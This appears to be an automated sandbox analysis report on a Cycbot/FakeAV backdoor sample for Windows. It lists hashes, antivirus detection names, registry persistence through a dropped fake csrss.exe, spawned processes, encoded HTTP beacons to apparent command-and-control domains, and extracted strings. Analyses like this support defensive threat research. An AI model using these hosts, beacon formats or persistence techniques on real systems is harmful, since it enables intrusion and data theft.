Analysis Date: 2014-10-09 13:16:53
MD5: 5eed0baa47733cd14eab8c714a4679da
SHA1: 9497588047b5a853e3fb0373cc3befa2e747851e

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text: md5: 70aa5462b79268fd92fcd903a36bd19a sha1: 40e614174cc56a3b6642af57a94fb28f8f0f0078 size: 132608
Section .rdata: md5: 39268d995ca32110161c2f175c67e07b sha1: 6a947719261f77054dce183e3d44fb66fba3b766 size: 4096
Section .data: md5: 8277d2a1bd8fabce05c6a2d18df62779 sha1: aa7909b4da5e9bfeef11c1c9fb9f596759fcaa69 size: 52224
Section .crt: md5: 21be537f910dbec46b803a5e720540e3 sha1: 02d14ac3b01fe322dcaa2b4876efe8021351e070 size: 512
Timestamp: 2005-11-29 09:04:31
Version: PrivateBuild: 1291
PEhash: 0dc888ec37bcbbb156433c3c93a6d696ec4ae56d
IMPhash: 37ba33cb6a2c78c37c714cff044e1797
AV 360 Safe: Gen:Trojan.Heur.KS.1
AV Ad-Aware: Gen:Trojan.Heur.KS.1
AV Alwil (avast): Cybota [Trj]
AV Arcabit (arcavir): no_virus
AV Authentium: W32/Goolbot.E.gen!Eldorado
AV Avira (antivir): TR/Crypt.XPACK.Gen
AV CA (E-Trust Ino): Win32/Gbot.A!generic
AV CAT (quickheal): Backdoor.Cycbot.B
AV ClamAV: Win.Trojan.Cycbot-3312
AV Dr. Web: Trojan.DownLoader1.58142
AV Emsisoft: Gen:Trojan.Heur.KS.1
AV Eset (nod32): Win32/Kryptik.JWH
AV Fortinet: W32/FakeAV.PACK!tr
AV Frisk (f-prot): W32/Goolbot.E.gen!Eldorado
AV F-Secure: Gen:Trojan.Heur.KS.1
AV Grisoft (avg): Cryptic.CAM
AV Ikarus: Backdoor.Win32.Cycbot
AV K7: Backdoor ( 003210941 )
AV Kaspersky: Trojan.Win32.Pakes.oli
AV MalwareBytes: Spyware.Passwords.XGen
AV Mcafee: BackDoor-EXI.gen.h
AV Microsoft Security Essentials: Backdoor:Win32/Cycbot.G
AV MicroWorld (escan): no_virus
AV Norman: winpe/Cycbot.BH
AV Rising: Trojan.Win32.Generic.127342F6
AV Sophos: Mal/FakeAV-IS
AV Symantec: Trojan.Gen
AV Trend Micro: BKDR_CYCBOT.SMIB
AV VirusBlokAda (vba32): Trojan.Pakes
AV Yara APT: no_virus
AV Zillya!: Trojan.Pakes.Win32.9382

Runtime Details:

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ 1
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load ➝ C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates File: C:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data
Creates Process: C:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates Mutex: {C66E79CE-8005-4ed9-A6B1-4983619CB922}
Creates Mutex: {4D92BB9F-9A66-458f-ACA4-66172A7016D4}
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: {61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex: {EEEB680D-AE62-4375-B93E-E9AE5FF585C1}
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: {B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNS: 127.0.0.1
Winsock DNS: zonedg.com
Winsock DNS: sharewareconnection.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft

Creates Process: C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data

Creates Process: C:\Documents and Settings\Administrator\Application Data\dwm.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\dwm.exe

Network Details:

DNS: sharewareconnection.com, Type: A ➝ 216.240.159.81
DNS: zonetf.com, Type: A ➝ 141.8.225.80
DNS: zonedg.com, Type: A ➝ 141.8.225.80
HTTP GET: http://sharewareconnection.com/images/ubar_0.jpg?tq=gJ4WK%2FSUh4TDhRMw9YLJiMSTUivqg4aEwpFEfqHXarVJ%2BQhhcHo%3D
  User-Agent: iamx/3.11
HTTP POST: http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJuX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOpPRO%2FUq%2F3vleWbkY%3D
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POST: http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJuX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88y%2BcoJsX%2BSNxFKv975Xlm5G
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POST: http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJuX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh%2FMe%2BcoJuX%2BSNxFKv975Xlm5G
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP GET: http://zonedg.com/images/im133.jpg?tq=gKZEtzyMv5rJqxG1J42pzMffBvYj1ejbwvgS917V65rJqlLfgPiWW1cg
  User-Agent: iamx/3.11
HTTP POST: http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJuX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88BSr%2Fe%2BV5ZuRg%3D%3D
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POST: http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJuX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh8sG%2BcoJsX%2BSNwVKv975Xlm5G
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POST: http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJuX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88y%2BcoJtX%2BSNxFKv975Xlm5G
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POST: http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJuX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh%2FMe%2BcoJuX%2BSNxVKv975Xlm5G
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP GET: http://zonedg.com/images/im133.jpg?tq=gKZEtzyMv5rJqxG1J42pzMffBvYj1ejbwvgS917W65rJqlLfgPiWW1cg
  User-Agent: iamx/3.11
HTTP POST: http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJuX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88BSr%2Fe%2BV5ZuRg%3D%3D
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POST: http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJuX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh8sG%2BcoJtX%2BSNxVKv975Xlm5G
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Flows TCP: 192.168.1.1:1031 ➝ 216.240.159.81:80
Flows TCP: 192.168.1.1:1032 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1033 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1034 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1035 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1036 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1037 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1038 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1039 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1040 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1041 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1042 ➝ 141.8.225.80:80

Strings
040904b0
1291
PrivateBuild
StringFileInfo
TIMES NEW ROMAN
Translation
VarFileInfo
VS_VERSION_INFO
ADVAPI32.dll
AlphaBlend
CharNextA
CheckDlgButton
CloseHandle
CoCreateInstance
CoTaskMemAlloc
CoTaskMemFree
CoTaskMemRealloc
CreateDialogParamA
CreateFontIndirectA
@.data
DeleteCriticalSection
DeleteObject
DestroyWindow
DisableThreadLibraryCalls
EnableWindow
EnterCriticalSection
EnumResourceNamesW
ExitProcess
FindResourceA
FlushFileBuffers
FlushInstructionCache
FreeEnvironmentStringsA
FreeEnvironmentStringsW
FreeLibrary
GDI32.dll
GetACP
GetCommandLineA
GetCPInfo
GetCurrentProcess
GetCurrentProcessId
GetCurrentThreadId
GetDeviceCaps
GetDialogBaseUnits
GetDlgItem
GetDlgItemTextA
GetEnvironmentStrings
GetEnvironmentStringsW
GetFileType
GetLastError
GetLocaleInfoA
GetModuleFileNameA
GetModuleHandleA
GetOEMCP
GetProcAddress
GetProcessHeap
GetStartupInfoA
GetStdHandle
GetStringTypeA
GetStringTypeW
GetSystemInfo
GetSystemTimeAsFileTime
GetTextExtentPointA
GetTextMetricsA
GetThreadLocale
GetTickCount
GetVersionExA
HeapAlloc
HeapCreate
HeapDestroy
HeapFree
HeapReAlloc
HeapSize
InitializeCriticalSection
InterlockedDecrement
InterlockedExchange
InterlockedIncrement
IsBadCodePtr
IsBadReadPtr
IsBadWritePtr
IsDBCSLeadByte
IsDialogMessageA
IsDlgButtonChecked
IsWindow
KERNEL32.dll
LCMapStringA
LCMapStringW
LeaveCriticalSection
LoadLibraryA
LoadLibraryExA
LoadResource
LockResource
lstrcatA
lstrcmpiA
lstrcpyA
lstrcpynA
lstrlenA
lstrlenW
MoveWindow
MSIMG32.dll
MulDiv
MultiByteToWideChar
ole32.dll
PathFindExtensionA
QueryPerformanceCounter
RaiseException
`.rdata
RegCloseKey
RegCreateKeyExA
RegDeleteKeyA
RegDeleteValueA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
RegSetValueExA
ReleaseDC
RtlUnwind
SelectObject
SendMessageA
SetDlgItemTextA
SetFilePointer
SetHandleCount
SetHandleInformation
SetLastError
SetStdHandle
SetUnhandledExceptionFilter
SetWindowLongA
SHLWAPI.dll
ShowWindow
SizeofResource
StringFromGUID2
TerminateProcess
!This program cannot be run in DOS mode.
TlsAlloc
TlsFree
TlsGetValue
TlsSetValue
TransmitCommChar
TransparentBlt
UnhandledExceptionFilter
UnregisterClassA
USER32.dll
VirtualAlloc
VirtualFree
VirtualProtect
VirtualQuery
WideCharToMultiByte
WinHelpA
WriteFile